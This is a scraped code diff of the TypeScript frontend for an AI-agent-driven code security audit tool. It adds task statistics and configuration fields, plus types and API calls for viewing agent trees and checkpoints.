"/audit-tasks": <ListTodo className="w-5 h-5" />,
|
||||
"/agent-audit": <Bot className="w-5 h-5" />,
|
||||
"/audit-rules": <Shield className="w-5 h-5" />,
|
||||
"/prompts": <MessageSquare className="w-5 h-5" />,
|
||||
"/admin": <Settings className="w-5 h-5" />,
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
|
|
@ -26,6 +26,11 @@ export interface AgentTask {
|
|||
verified_count: number;
|
||||
false_positive_count: number;
|
||||
|
||||
// Agent 统计
|
||||
total_iterations: number;
|
||||
tool_calls_count: number;
|
||||
tokens_used: number;
|
||||
|
||||
// 严重程度统计
|
||||
critical_count: number;
|
||||
high_count: number;
|
||||
|
|
@ -34,7 +39,7 @@ export interface AgentTask {
|
|||
|
||||
// 评分
|
||||
quality_score: number;
|
||||
security_score: number;
|
||||
security_score: number | null;
|
||||
|
||||
// 时间
|
||||
created_at: string;
|
||||
|
|
@ -44,6 +49,13 @@ export interface AgentTask {
|
|||
// 进度
|
||||
progress_percentage: number;
|
||||
|
||||
// 配置
|
||||
audit_scope: Record<string, unknown> | null;
|
||||
target_vulnerabilities: string[] | null;
|
||||
verification_level: string | null;
|
||||
exclude_patterns: string[] | null;
|
||||
target_files: string[] | null;
|
||||
|
||||
// 错误信息
|
||||
error_message: string | null;
|
||||
}
|
||||
|
|
@ -307,3 +319,89 @@ export async function* streamAgentEvents(
|
|||
}
|
||||
}
|
||||
|
||||
// ============ Agent Tree Types ============
|
||||
|
||||
/**
 * One agent in the agent tree of a task.
 *
 * The shape is recursive: every node carries a `children` array of further
 * `AgentTreeNode` values.
 */
export interface AgentTreeNode {
  id: string;
  agent_id: string;
  agent_name: string;
  agent_type: string;
  /** `null` when the node has no parent (presumably the root — confirm against the API). */
  parent_agent_id: string | null;
  depth: number;
  task_description: string | null;
  knowledge_modules: string[] | null;
  /** Lifecycle state of the agent. */
  status: "created" | "running" | "completed" | "failed" | "waiting";
  result_summary: string | null;

  // Per-agent counters.
  findings_count: number;
  iterations: number;
  tokens_used: number;
  tool_calls: number;
  /** Duration in milliseconds, or `null` when none is reported. */
  duration_ms: number | null;

  /** Nested child nodes. */
  children: AgentTreeNode[];
}
|
||||
|
||||
/**
 * Agent tree of a task: aggregate counters plus the tree nodes themselves.
 */
export interface AgentTreeResponse {
  task_id: string;
  /** `null` when no root agent id is reported. */
  root_agent_id: string | null;

  // Aggregate counters.
  total_agents: number;
  running_agents: number;
  completed_agents: number;
  failed_agents: number;
  total_findings: number;

  /** Tree nodes; each node nests its own `children`. */
  nodes: AgentTreeNode[];
}
|
||||
|
||||
/**
 * Summary of a saved agent checkpoint.
 */
export interface AgentCheckpoint {
  id: string;

  // Agent the checkpoint belongs to.
  agent_id: string;
  agent_name: string;
  agent_type: string;

  // Agent progress recorded with the checkpoint.
  iteration: number;
  status: string;
  total_tokens: number;
  tool_calls: number;
  findings_count: number;

  /** Kind of checkpoint. */
  checkpoint_type: "auto" | "manual" | "error" | "final";
  checkpoint_name: string | null;
  /** Creation timestamp as a string, or `null` when absent. */
  created_at: string | null;
}
|
||||
|
||||
/**
 * Full checkpoint record: the `AgentCheckpoint` summary fields plus the owning
 * task, the parent agent and the stored state.
 */
export interface CheckpointDetail extends AgentCheckpoint {
  task_id: string;
  /** `null` when the agent has no parent. */
  parent_agent_id: string | null;
  /** State payload stored with the checkpoint; its schema is not defined here. */
  state_data: Record<string, unknown>;
  metadata: Record<string, unknown> | null;
}
|
||||
|
||||
// ============ Agent Tree API Functions ============
|
||||
|
||||
/**
 * Fetch the agent tree of a task.
 *
 * Issues `GET /agent-tasks/{taskId}/agent-tree` and resolves with the
 * response body.
 *
 * @param taskId Id of the agent task.
 * @returns The agent tree of the task.
 */
export async function getAgentTree(taskId: string): Promise<AgentTreeResponse> {
  const { data } = await apiClient.get(`/agent-tasks/${taskId}/agent-tree`);
  return data;
}
|
||||
|
||||
/**
 * Fetch the checkpoint list of a task.
 *
 * Issues `GET /agent-tasks/{taskId}/checkpoints`, forwarding `params` as the
 * request's `params` option.
 *
 * @param taskId Id of the agent task.
 * @param params Optional `agent_id` / `limit` values forwarded with the request.
 * @returns The checkpoints of the task.
 */
export async function getAgentCheckpoints(
  taskId: string,
  params?: { agent_id?: string; limit?: number }
): Promise<AgentCheckpoint[]> {
  const url = `/agent-tasks/${taskId}/checkpoints`;
  const { data } = await apiClient.get(url, { params });
  return data;
}
|
||||
|
||||
/**
 * Fetch the full record of a single checkpoint.
 *
 * Issues `GET /agent-tasks/{taskId}/checkpoints/{checkpointId}` and resolves
 * with the response body.
 *
 * @param taskId       Id of the agent task.
 * @param checkpointId Id of the checkpoint.
 * @returns The checkpoint detail.
 */
export async function getCheckpointDetail(
  taskId: string,
  checkpointId: string
): Promise<CheckpointDetail> {
  const url = `/agent-tasks/${taskId}/checkpoints/${checkpointId}`;
  const { data } = await apiClient.get(url);
  return data;
}
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue